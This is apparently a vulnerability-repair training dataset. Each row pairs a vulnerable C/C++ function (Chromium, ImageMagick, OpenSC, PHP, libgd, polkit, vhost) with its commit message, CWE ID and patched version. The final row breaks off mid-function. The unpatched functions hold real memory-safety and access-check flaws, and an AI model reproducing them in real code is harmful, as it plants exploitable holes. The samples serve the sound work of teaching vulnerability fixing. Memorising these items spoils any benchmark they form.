instruction
stringclasses
1 value
input
stringlengths
90
139k
output
stringlengths
16
138k
__index_level_0__
int64
165k
175k
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: const Extension* ExtensionAppItem::GetExtension() const { const ExtensionService* service = extensions::ExtensionSystem::Get(profile_)->extension_service(); const Extension* extension = service->GetInstalledExtension(extension_id_); return extension; } Commit Message: [Extensions] Add GetInstalledExtension() method to ExtensionRegistry This CL adds GetInstalledExtension() method to ExtensionRegistry and uses it instead of deprecated ExtensionService::GetInstalledExtension() in chrome/browser/ui/app_list/. Part of removing the deprecated GetInstalledExtension() call from the ExtensionService. BUG=489687 Review URL: https://codereview.chromium.org/1130353010 Cr-Commit-Position: refs/heads/master@{#333036} CWE ID:
const Extension* ExtensionAppItem::GetExtension() const { const extensions::ExtensionRegistry* registry = extensions::ExtensionRegistry::Get(profile_); const Extension* extension = registry->GetInstalledExtension( extension_id_); return extension; }
171,723
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void Browser::ToggleFullscreenModeForTab(TabContents* tab, bool enter_fullscreen) { if (tab != GetSelectedTabContents()) return; fullscreened_tab_ = enter_fullscreen ? TabContentsWrapper::GetCurrentWrapperForContents(tab) : NULL; if (enter_fullscreen && !window_->IsFullscreen()) tab_caused_fullscreen_ = true; if (tab_caused_fullscreen_) ToggleFullscreenMode(); } Commit Message: Implement a bubble that appears at the top of the screen when a tab enters fullscreen mode via webkitRequestFullScreen(), telling the user how to exit fullscreen. This is implemented as an NSView rather than an NSWindow because the floating chrome that appears in presentation mode should overlap the bubble. Content-initiated fullscreen mode makes use of 'presentation mode' on the Mac: the mode in which the UI is hidden, accessible by moving the cursor to the top of the screen. On Snow Leopard, this mode is synonymous with fullscreen mode. On Lion, however, fullscreen mode does not imply presentation mode: in non-presentation fullscreen mode, the chrome is permanently shown. It is possible to switch between presentation mode and fullscreen mode using the presentation mode UI control. When a tab initiates fullscreen mode on Lion, we enter presentation mode if not in presentation mode already. When the user exits fullscreen mode using Chrome UI (i.e. keyboard shortcuts, menu items, buttons, switching tabs, etc.) we return the user to the mode they were in before the tab entered fullscreen. BUG=14471 TEST=Enter fullscreen mode using webkitRequestFullScreen. You should see a bubble pop down from the top of the screen. Need to test the Lion logic somehow, with no Lion trybots. BUG=96883 Original review http://codereview.chromium.org/7890056/ TBR=thakis Review URL: http://codereview.chromium.org/7920024 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@101624 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-119
void Browser::ToggleFullscreenModeForTab(TabContents* tab, bool enter_fullscreen) { if (tab != GetSelectedTabContents()) return; fullscreened_tab_ = enter_fullscreen ? TabContentsWrapper::GetCurrentWrapperForContents(tab) : NULL; bool in_correct_mode_for_tab_fullscreen; #if defined(OS_MACOSX) in_correct_mode_for_tab_fullscreen = window_->InPresentationMode(); #else in_correct_mode_for_tab_fullscreen = window_->IsFullscreen(); #endif if (enter_fullscreen && !in_correct_mode_for_tab_fullscreen) tab_caused_fullscreen_ = true; if (tab_caused_fullscreen_) { #if defined(OS_MACOSX) TogglePresentationMode(); #else ToggleFullscreenMode(); #endif } }
170,252
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static Image *ReadAAIImage(const ImageInfo *image_info,ExceptionInfo *exception) { Image *image; MagickBooleanType status; register ssize_t x; register PixelPacket *q; register unsigned char *p; size_t height, length, width; ssize_t count, y; unsigned char *pixels; /* Open image file. */ assert(image_info != (const ImageInfo *) NULL); assert(image_info->signature == MagickSignature); if (image_info->debug != MagickFalse) (void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s", image_info->filename); assert(exception != (ExceptionInfo *) NULL); assert(exception->signature == MagickSignature); image=AcquireImage(image_info); status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception); if (status == MagickFalse) { image=DestroyImageList(image); return((Image *) NULL); } /* Read AAI Dune image. */ width=ReadBlobLSBLong(image); height=ReadBlobLSBLong(image); if (EOFBlob(image) != MagickFalse) ThrowReaderException(CorruptImageError,"ImproperImageHeader"); if ((width == 0UL) || (height == 0UL)) ThrowReaderException(CorruptImageError,"ImproperImageHeader"); do { /* Convert AAI raster image to pixel packets. */ image->columns=width; image->rows=height; image->depth=8; if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0)) if (image->scene >= (image_info->scene+image_info->number_scenes-1)) break; pixels=(unsigned char *) AcquireQuantumMemory(image->columns, 4*sizeof(*pixels)); if (pixels == (unsigned char *) NULL) ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed"); length=(size_t) 4*image->columns; for (y=0; y < (ssize_t) image->rows; y++) { count=ReadBlob(image,length,pixels); if ((size_t) count != length) ThrowReaderException(CorruptImageError,"UnableToReadImageData"); p=pixels; q=QueueAuthenticPixels(image,0,y,image->columns,1,exception); if (q == (PixelPacket *) NULL) break; for (x=0; x < (ssize_t) image->columns; x++) { SetPixelBlue(q,ScaleCharToQuantum(*p++)); SetPixelGreen(q,ScaleCharToQuantum(*p++)); SetPixelRed(q,ScaleCharToQuantum(*p++)); if (*p == 254) *p=255; SetPixelAlpha(q,ScaleCharToQuantum(*p++)); if (q->opacity != OpaqueOpacity) image->matte=MagickTrue; q++; } if (SyncAuthenticPixels(image,exception) == MagickFalse) break; if (image->previous == (Image *) NULL) { status=SetImageProgress(image,LoadImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } } pixels=(unsigned char *) RelinquishMagickMemory(pixels); if (EOFBlob(image) != MagickFalse) { ThrowFileException(exception,CorruptImageError,"UnexpectedEndOfFile", image->filename); break; } /* Proceed to next image. */ if (image_info->number_scenes != 0) if (image->scene >= (image_info->scene+image_info->number_scenes-1)) break; width=ReadBlobLSBLong(image); height=ReadBlobLSBLong(image); if ((width != 0UL) && (height != 0UL)) { /* Allocate next image structure. */ AcquireNextImage(image_info,image); if (GetNextImageInList(image) == (Image *) NULL) { image=DestroyImageList(image); return((Image *) NULL); } image=SyncNextImageInList(image); status=SetImageProgress(image,LoadImagesTag,TellBlob(image), GetBlobSize(image)); if (status == MagickFalse) break; } } while ((width != 0UL) && (height != 0UL)); (void) CloseBlob(image); return(GetFirstImageInList(image)); } Commit Message: CWE ID: CWE-119
static Image *ReadAAIImage(const ImageInfo *image_info,ExceptionInfo *exception) { Image *image; MagickBooleanType status; register ssize_t x; register PixelPacket *q; register unsigned char *p; size_t height, length, width; ssize_t count, y; unsigned char *pixels; /* Open image file. */ assert(image_info != (const ImageInfo *) NULL); assert(image_info->signature == MagickSignature); if (image_info->debug != MagickFalse) (void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s", image_info->filename); assert(exception != (ExceptionInfo *) NULL); assert(exception->signature == MagickSignature); image=AcquireImage(image_info); status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception); if (status == MagickFalse) { image=DestroyImageList(image); return((Image *) NULL); } /* Read AAI Dune image. */ width=ReadBlobLSBLong(image); height=ReadBlobLSBLong(image); if (EOFBlob(image) != MagickFalse) ThrowReaderException(CorruptImageError,"ImproperImageHeader"); if ((width == 0UL) || (height == 0UL)) ThrowReaderException(CorruptImageError,"ImproperImageHeader"); do { /* Convert AAI raster image to pixel packets. */ image->columns=width; image->rows=height; image->depth=8; if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0)) if (image->scene >= (image_info->scene+image_info->number_scenes-1)) break; status=SetImageExtent(image,image->columns,image->rows); if (status == MagickFalse) { InheritException(exception,&image->exception); return(DestroyImageList(image)); } pixels=(unsigned char *) AcquireQuantumMemory(image->columns, 4*sizeof(*pixels)); if (pixels == (unsigned char *) NULL) ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed"); length=(size_t) 4*image->columns; for (y=0; y < (ssize_t) image->rows; y++) { count=ReadBlob(image,length,pixels); if ((size_t) count != length) ThrowReaderException(CorruptImageError,"UnableToReadImageData"); p=pixels; q=QueueAuthenticPixels(image,0,y,image->columns,1,exception); if (q == (PixelPacket *) NULL) break; for (x=0; x < (ssize_t) image->columns; x++) { SetPixelBlue(q,ScaleCharToQuantum(*p++)); SetPixelGreen(q,ScaleCharToQuantum(*p++)); SetPixelRed(q,ScaleCharToQuantum(*p++)); if (*p == 254) *p=255; SetPixelAlpha(q,ScaleCharToQuantum(*p++)); if (q->opacity != OpaqueOpacity) image->matte=MagickTrue; q++; } if (SyncAuthenticPixels(image,exception) == MagickFalse) break; if (image->previous == (Image *) NULL) { status=SetImageProgress(image,LoadImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } } pixels=(unsigned char *) RelinquishMagickMemory(pixels); if (EOFBlob(image) != MagickFalse) { ThrowFileException(exception,CorruptImageError,"UnexpectedEndOfFile", image->filename); break; } /* Proceed to next image. */ if (image_info->number_scenes != 0) if (image->scene >= (image_info->scene+image_info->number_scenes-1)) break; width=ReadBlobLSBLong(image); height=ReadBlobLSBLong(image); if ((width != 0UL) && (height != 0UL)) { /* Allocate next image structure. */ AcquireNextImage(image_info,image); if (GetNextImageInList(image) == (Image *) NULL) { image=DestroyImageList(image); return((Image *) NULL); } image=SyncNextImageInList(image); status=SetImageProgress(image,LoadImagesTag,TellBlob(image), GetBlobSize(image)); if (status == MagickFalse) break; } } while ((width != 0UL) && (height != 0UL)); (void) CloseBlob(image); return(GetFirstImageInList(image)); }
168,546
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static int entersafe_gen_key(sc_card_t *card, sc_entersafe_gen_key_data *data) { int r; size_t len = data->key_length >> 3; sc_apdu_t apdu; u8 rbuf[300]; u8 sbuf[4],*p; SC_FUNC_CALLED(card->ctx, SC_LOG_DEBUG_VERBOSE); /* MSE */ sc_format_apdu(card, &apdu, SC_APDU_CASE_3_SHORT, 0x22, 0x01, 0xB8); apdu.lc=0x04; sbuf[0]=0x83; sbuf[1]=0x02; sbuf[2]=data->key_id; sbuf[3]=0x2A; apdu.data = sbuf; apdu.datalen=4; apdu.lc=4; apdu.le=0; r=entersafe_transmit_apdu(card, &apdu, 0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe set MSE failed"); /* generate key */ sc_format_apdu(card, &apdu, SC_APDU_CASE_3_SHORT, 0x46, 0x00, 0x00); apdu.le = 0; sbuf[0] = (u8)(data->key_length >> 8); sbuf[1] = (u8)(data->key_length); apdu.data = sbuf; apdu.lc = 2; apdu.datalen = 2; r = entersafe_transmit_apdu(card, &apdu,0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe generate keypair failed"); /* read public key via READ PUBLIC KEY */ sc_format_apdu(card, &apdu, SC_APDU_CASE_2_SHORT, 0xE6, 0x2A, data->key_id); apdu.cla = 0x80; apdu.resp = rbuf; apdu.resplen = sizeof(rbuf); apdu.le = 256; r = entersafe_transmit_apdu(card, &apdu,0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe get pukey failed"); data->modulus = malloc(len); if (!data->modulus) SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,SC_ERROR_OUT_OF_MEMORY); p=rbuf; assert(*p=='E'); p+=2+p[1]; /* N */ assert(*p=='N'); ++p; if(*p++>0x80) { u8 len_bytes=(*(p-1))&0x0f; size_t module_len=0; while(len_bytes!=0) { module_len=module_len<<8; module_len+=*p++; --len_bytes; } } entersafe_reverse_buffer(p,len); memcpy(data->modulus,p,len); SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,SC_SUCCESS); } Commit Message: fixed out of bounds reads Thanks to Eric Sesterhenn from X41 D-SEC GmbH for reporting and suggesting security fixes. CWE ID: CWE-125
static int entersafe_gen_key(sc_card_t *card, sc_entersafe_gen_key_data *data) { int r; size_t len = data->key_length >> 3; sc_apdu_t apdu; u8 rbuf[300]; u8 sbuf[4],*p; SC_FUNC_CALLED(card->ctx, SC_LOG_DEBUG_VERBOSE); /* MSE */ sc_format_apdu(card, &apdu, SC_APDU_CASE_3_SHORT, 0x22, 0x01, 0xB8); apdu.lc=0x04; sbuf[0]=0x83; sbuf[1]=0x02; sbuf[2]=data->key_id; sbuf[3]=0x2A; apdu.data = sbuf; apdu.datalen=4; apdu.lc=4; apdu.le=0; r=entersafe_transmit_apdu(card, &apdu, 0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe set MSE failed"); /* generate key */ sc_format_apdu(card, &apdu, SC_APDU_CASE_3_SHORT, 0x46, 0x00, 0x00); apdu.le = 0; sbuf[0] = (u8)(data->key_length >> 8); sbuf[1] = (u8)(data->key_length); apdu.data = sbuf; apdu.lc = 2; apdu.datalen = 2; r = entersafe_transmit_apdu(card, &apdu,0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe generate keypair failed"); /* read public key via READ PUBLIC KEY */ sc_format_apdu(card, &apdu, SC_APDU_CASE_2_SHORT, 0xE6, 0x2A, data->key_id); apdu.cla = 0x80; apdu.resp = rbuf; apdu.resplen = sizeof(rbuf); apdu.le = 256; r = entersafe_transmit_apdu(card, &apdu,0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe get pukey failed"); data->modulus = malloc(len); if (!data->modulus) SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE, SC_ERROR_OUT_OF_MEMORY); p=rbuf; if (*p!='E') SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE, SC_ERROR_INVALID_DATA); p+=2+p[1]; /* N */ if (*p!='N') SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE, SC_ERROR_INVALID_DATA); ++p; if(*p++>0x80) { u8 len_bytes=(*(p-1))&0x0f; size_t module_len=0; while(len_bytes!=0) { module_len=module_len<<8; module_len+=*p++; --len_bytes; } } entersafe_reverse_buffer(p,len); memcpy(data->modulus,p,len); SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,SC_SUCCESS); }
169,052
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void DataReductionProxyConfig::InitializeOnIOThread( scoped_refptr<network::SharedURLLoaderFactory> url_loader_factory, WarmupURLFetcher::CreateCustomProxyConfigCallback create_custom_proxy_config_callback, NetworkPropertiesManager* manager) { DCHECK(thread_checker_.CalledOnValidThread()); network_properties_manager_ = manager; network_properties_manager_->ResetWarmupURLFetchMetrics(); secure_proxy_checker_.reset(new SecureProxyChecker(url_loader_factory)); warmup_url_fetcher_.reset(new WarmupURLFetcher( url_loader_factory, create_custom_proxy_config_callback, base::BindRepeating( &DataReductionProxyConfig::HandleWarmupFetcherResponse, base::Unretained(this)), base::BindRepeating(&DataReductionProxyConfig::GetHttpRttEstimate, base::Unretained(this)), ui_task_runner_)); if (ShouldAddDefaultProxyBypassRules()) AddDefaultProxyBypassRules(); network_connection_tracker_->AddNetworkConnectionObserver(this); network_connection_tracker_->GetConnectionType( &connection_type_, base::BindOnce(&DataReductionProxyConfig::OnConnectionChanged, weak_factory_.GetWeakPtr())); } Commit Message: Implicitly bypass localhost when proxying requests. This aligns Chrome's behavior with the Windows and macOS proxy resolvers (but not Firefox). Concretely: * localhost names (as determined by net::IsLocalhost) now implicitly bypass the proxy * link-local IP addresses implicitly bypass the proxy The implicit rules are handled by ProxyBypassRules, and it is possible to override them when manually configuring proxy settings (but not when using PAC or auto-detect). This change also adds support for the "<-loopback>" proxy bypass rule, with similar semantics as it has on Windows (removes the implicit bypass rules for localhost and link-local). The compatibility risk of this change should be low as proxying through localhost was not universally supported. It is however an idiom used in testing (a number of our own tests had such a dependency). Impacted users can use the "<-loopback>" bypass rule as a workaround. Bug: 413511, 899126, 901896 Change-Id: I263ca21ef9f12d4759a20cb4751dc3261bda6ac0 Reviewed-on: https://chromium-review.googlesource.com/c/1303626 Commit-Queue: Eric Roman <eroman@chromium.org> Reviewed-by: Dominick Ng <dominickn@chromium.org> Reviewed-by: Tarun Bansal <tbansal@chromium.org> Reviewed-by: Matt Menke <mmenke@chromium.org> Reviewed-by: Sami Kyöstilä <skyostil@chromium.org> Cr-Commit-Position: refs/heads/master@{#606112} CWE ID: CWE-20
void DataReductionProxyConfig::InitializeOnIOThread( scoped_refptr<network::SharedURLLoaderFactory> url_loader_factory, WarmupURLFetcher::CreateCustomProxyConfigCallback create_custom_proxy_config_callback, NetworkPropertiesManager* manager) { DCHECK(thread_checker_.CalledOnValidThread()); network_properties_manager_ = manager; network_properties_manager_->ResetWarmupURLFetchMetrics(); secure_proxy_checker_.reset(new SecureProxyChecker(url_loader_factory)); warmup_url_fetcher_.reset(new WarmupURLFetcher( url_loader_factory, create_custom_proxy_config_callback, base::BindRepeating( &DataReductionProxyConfig::HandleWarmupFetcherResponse, base::Unretained(this)), base::BindRepeating(&DataReductionProxyConfig::GetHttpRttEstimate, base::Unretained(this)), ui_task_runner_)); AddDefaultProxyBypassRules(); network_connection_tracker_->AddNetworkConnectionObserver(this); network_connection_tracker_->GetConnectionType( &connection_type_, base::BindOnce(&DataReductionProxyConfig::OnConnectionChanged, weak_factory_.GetWeakPtr())); }
172,640
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: BlockEntry::Kind Track::EOSBlock::GetKind() const { return kBlockEOS; } Commit Message: libwebm: Pull from upstream Rolling mkvparser from upstream. Primarily for fixing a bug on parsing failures with certain Opus WebM files. Upstream commit hash of this pull: 574045edd4ecbeb802ee3f1d214b5510269852ae The diff is so huge because there were some style clean ups upstream. But it was ensured that there were no breaking changes when the style clean ups was done upstream. Change-Id: Ib6e907175484b4b0ae1b55ab39522ea3188ad039 CWE ID: CWE-119
BlockEntry::Kind Track::EOSBlock::GetKind() const
174,331
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: psf_asciiheader_printf (SF_PRIVATE *psf, const char *format, ...) { va_list argptr ; int maxlen ; char *start ; maxlen = strlen ((char*) psf->header) ; start = ((char*) psf->header) + maxlen ; maxlen = sizeof (psf->header) - maxlen ; va_start (argptr, format) ; vsnprintf (start, maxlen, format, argptr) ; va_end (argptr) ; /* Make sure the string is properly terminated. */ start [maxlen - 1] = 0 ; psf->headindex = strlen ((char*) psf->header) ; return ; } /* psf_asciiheader_printf */ Commit Message: src/ : Move to a variable length header buffer Previously, the `psf->header` buffer was a fixed length specified by `SF_HEADER_LEN` which was set to `12292`. This was problematic for two reasons; this value was un-necessarily large for the majority of files and too small for some others. Now the size of the header buffer starts at 256 bytes and grows as necessary up to a maximum of 100k. CWE ID: CWE-119
psf_asciiheader_printf (SF_PRIVATE *psf, const char *format, ...) { va_list argptr ; int maxlen ; char *start ; maxlen = strlen ((char*) psf->header.ptr) ; start = ((char*) psf->header.ptr) + maxlen ; maxlen = psf->header.len - maxlen ; va_start (argptr, format) ; vsnprintf (start, maxlen, format, argptr) ; va_end (argptr) ; /* Make sure the string is properly terminated. */ start [maxlen - 1] = 0 ; psf->header.indx = strlen ((char*) psf->header.ptr) ; return ; } /* psf_asciiheader_printf */
170,063
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: ImageLoader::ImageLoader(Element* element) : m_element(element), m_derefElementTimer(this, &ImageLoader::timerFired), m_hasPendingLoadEvent(false), m_hasPendingErrorEvent(false), m_imageComplete(true), m_loadingImageDocument(false), m_elementIsProtected(false), m_suppressErrorEvents(false) { RESOURCE_LOADING_DVLOG(1) << "new ImageLoader " << this; } Commit Message: Move ImageLoader timer to frame-specific TaskRunnerTimer. Move ImageLoader timer m_derefElementTimer to frame-specific TaskRunnerTimer. This associates it with the frame's Networking timer task queue. BUG=624694 Review-Url: https://codereview.chromium.org/2642103002 Cr-Commit-Position: refs/heads/master@{#444927} CWE ID:
ImageLoader::ImageLoader(Element* element) : m_element(element), m_derefElementTimer(TaskRunnerHelper::get(TaskType::Networking, element->document().frame()), this, &ImageLoader::timerFired), m_hasPendingLoadEvent(false), m_hasPendingErrorEvent(false), m_imageComplete(true), m_loadingImageDocument(false), m_elementIsProtected(false), m_suppressErrorEvents(false) { RESOURCE_LOADING_DVLOG(1) << "new ImageLoader " << this; }
171,974
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: log_result (PolkitBackendInteractiveAuthority *authority, const gchar *action_id, PolkitSubject *subject, PolkitSubject *caller, PolkitAuthorizationResult *result) { PolkitBackendInteractiveAuthorityPrivate *priv; PolkitIdentity *user_of_subject; const gchar *log_result_str; gchar *subject_str; gchar *user_of_subject_str; gchar *caller_str; gchar *subject_cmdline; gchar *caller_cmdline; priv = POLKIT_BACKEND_INTERACTIVE_AUTHORITY_GET_PRIVATE (authority); log_result_str = "DENYING"; if (polkit_authorization_result_get_is_authorized (result)) log_result_str = "ALLOWING"; user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor, subject, NULL); subject_str = polkit_subject_to_string (subject); if (user_of_subject != NULL) user_of_subject_str = polkit_identity_to_string (user_of_subject); else user_of_subject_str = g_strdup ("<unknown>"); caller_str = polkit_subject_to_string (caller); subject_cmdline = _polkit_subject_get_cmdline (subject); if (subject_cmdline == NULL) subject_cmdline = g_strdup ("<unknown>"); caller_cmdline = _polkit_subject_get_cmdline (caller); if (caller_cmdline == NULL) caller_cmdline = g_strdup ("<unknown>"); polkit_backend_authority_log (POLKIT_BACKEND_AUTHORITY (authority), "%s action %s for %s [%s] owned by %s (check requested by %s [%s])", log_result_str, action_id, subject_str, subject_cmdline, user_of_subject_str, caller_str, caller_cmdline); if (user_of_subject != NULL) g_object_unref (user_of_subject); g_free (subject_str); g_free (user_of_subject_str); g_free (caller_str); g_free (subject_cmdline); g_free (caller_cmdline); } Commit Message: CWE ID: CWE-200
log_result (PolkitBackendInteractiveAuthority *authority, const gchar *action_id, PolkitSubject *subject, PolkitSubject *caller, PolkitAuthorizationResult *result) { PolkitBackendInteractiveAuthorityPrivate *priv; PolkitIdentity *user_of_subject; const gchar *log_result_str; gchar *subject_str; gchar *user_of_subject_str; gchar *caller_str; gchar *subject_cmdline; gchar *caller_cmdline; priv = POLKIT_BACKEND_INTERACTIVE_AUTHORITY_GET_PRIVATE (authority); log_result_str = "DENYING"; if (polkit_authorization_result_get_is_authorized (result)) log_result_str = "ALLOWING"; user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor, subject, NULL, NULL); subject_str = polkit_subject_to_string (subject); if (user_of_subject != NULL) user_of_subject_str = polkit_identity_to_string (user_of_subject); else user_of_subject_str = g_strdup ("<unknown>"); caller_str = polkit_subject_to_string (caller); subject_cmdline = _polkit_subject_get_cmdline (subject); if (subject_cmdline == NULL) subject_cmdline = g_strdup ("<unknown>"); caller_cmdline = _polkit_subject_get_cmdline (caller); if (caller_cmdline == NULL) caller_cmdline = g_strdup ("<unknown>"); polkit_backend_authority_log (POLKIT_BACKEND_AUTHORITY (authority), "%s action %s for %s [%s] owned by %s (check requested by %s [%s])", log_result_str, action_id, subject_str, subject_cmdline, user_of_subject_str, caller_str, caller_cmdline); if (user_of_subject != NULL) g_object_unref (user_of_subject); g_free (subject_str); g_free (user_of_subject_str); g_free (caller_str); g_free (subject_cmdline); g_free (caller_cmdline); }
165,287
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: PHP_FUNCTION(linkinfo) { char *link; size_t link_len; zend_stat_t sb; int ret; if (zend_parse_parameters(ZEND_NUM_ARGS(), "p", &link, &link_len) == FAILURE) { return; } ret = VCWD_STAT(link, &sb); if (ret == -1) { php_error_docref(NULL, E_WARNING, "%s", strerror(errno)); RETURN_LONG(Z_L(-1)); } RETURN_LONG((zend_long) sb.st_dev); } Commit Message: Fixed bug #76459 windows linkinfo lacks openbasedir check CWE ID: CWE-200
PHP_FUNCTION(linkinfo) { char *link; char *dirname; size_t link_len; zend_stat_t sb; int ret; if (zend_parse_parameters(ZEND_NUM_ARGS(), "p", &link, &link_len) == FAILURE) { return; } dirname = estrndup(link, link_len); php_dirname(dirname, link_len); if (php_check_open_basedir(dirname)) { efree(dirname); RETURN_FALSE; } ret = VCWD_STAT(link, &sb); if (ret == -1) { php_error_docref(NULL, E_WARNING, "%s", strerror(errno)); efree(dirname); RETURN_LONG(Z_L(-1)); } efree(dirname); RETURN_LONG((zend_long) sb.st_dev); }
169,107
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static inline LineContribType * _gdContributionsAlloc(unsigned int line_length, unsigned int windows_size) { unsigned int u = 0; LineContribType *res; int overflow_error = 0; res = (LineContribType *) gdMalloc(sizeof(LineContribType)); if (!res) { return NULL; } res->WindowSize = windows_size; res->LineLength = line_length; if (overflow2(line_length, sizeof(ContributionType))) { gdFree(res); return NULL; } res->ContribRow = (ContributionType *) gdMalloc(line_length * sizeof(ContributionType)); if (res->ContribRow == NULL) { gdFree(res); return NULL; } for (u = 0 ; u < line_length ; u++) { if (overflow2(windows_size, sizeof(double))) { overflow_error = 1; } else { res->ContribRow[u].Weights = (double *) gdMalloc(windows_size * sizeof(double)); } if (overflow_error == 1 || res->ContribRow[u].Weights == NULL) { unsigned int i; u--; for (i=0;i<=u;i++) { gdFree(res->ContribRow[i].Weights); } gdFree(res->ContribRow); gdFree(res); return NULL; } } return res; } Commit Message: Fix potential unsigned underflow No need to decrease `u`, so we don't do it. While we're at it, we also factor out the overflow check of the loop, what improves performance and readability. This issue has been reported by Stefan Esser to security@libgd.org. CWE ID: CWE-191
static inline LineContribType * _gdContributionsAlloc(unsigned int line_length, unsigned int windows_size) { unsigned int u = 0; LineContribType *res; size_t weights_size; if (overflow2(windows_size, sizeof(double))) { return NULL; } else { weights_size = windows_size * sizeof(double); } res = (LineContribType *) gdMalloc(sizeof(LineContribType)); if (!res) { return NULL; } res->WindowSize = windows_size; res->LineLength = line_length; if (overflow2(line_length, sizeof(ContributionType))) { gdFree(res); return NULL; } res->ContribRow = (ContributionType *) gdMalloc(line_length * sizeof(ContributionType)); if (res->ContribRow == NULL) { gdFree(res); return NULL; } for (u = 0 ; u < line_length ; u++) { res->ContribRow[u].Weights = (double *) gdMalloc(weights_size); if (res->ContribRow[u].Weights == NULL) { unsigned int i; for (i=0;i<u;i++) { gdFree(res->ContribRow[i].Weights); } gdFree(res->ContribRow); gdFree(res); return NULL; } } return res; }
168,511
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: long vhost_dev_ioctl(struct vhost_dev *d, unsigned int ioctl, void __user *argp) { struct file *eventfp, *filep = NULL; struct eventfd_ctx *ctx = NULL; u64 p; long r; int i, fd; /* If you are not the owner, you can become one */ if (ioctl == VHOST_SET_OWNER) { r = vhost_dev_set_owner(d); goto done; } /* You must be the owner to do anything else */ r = vhost_dev_check_owner(d); if (r) goto done; switch (ioctl) { case VHOST_SET_MEM_TABLE: r = vhost_set_memory(d, argp); break; case VHOST_SET_LOG_BASE: if (copy_from_user(&p, argp, sizeof p)) { r = -EFAULT; break; } if ((u64)(unsigned long)p != p) { r = -EFAULT; break; } for (i = 0; i < d->nvqs; ++i) { struct vhost_virtqueue *vq; void __user *base = (void __user *)(unsigned long)p; vq = d->vqs[i]; mutex_lock(&vq->mutex); /* If ring is inactive, will check when it's enabled. */ if (vq->private_data && !vq_log_access_ok(vq, base)) r = -EFAULT; else vq->log_base = base; mutex_unlock(&vq->mutex); } break; case VHOST_SET_LOG_FD: r = get_user(fd, (int __user *)argp); if (r < 0) break; eventfp = fd == -1 ? NULL : eventfd_fget(fd); if (IS_ERR(eventfp)) { r = PTR_ERR(eventfp); break; } if (eventfp != d->log_file) { filep = d->log_file; ctx = d->log_ctx; d->log_ctx = eventfp ? eventfd_ctx_fileget(eventfp) : NULL; } else filep = eventfp; for (i = 0; i < d->nvqs; ++i) { mutex_lock(&d->vqs[i]->mutex); 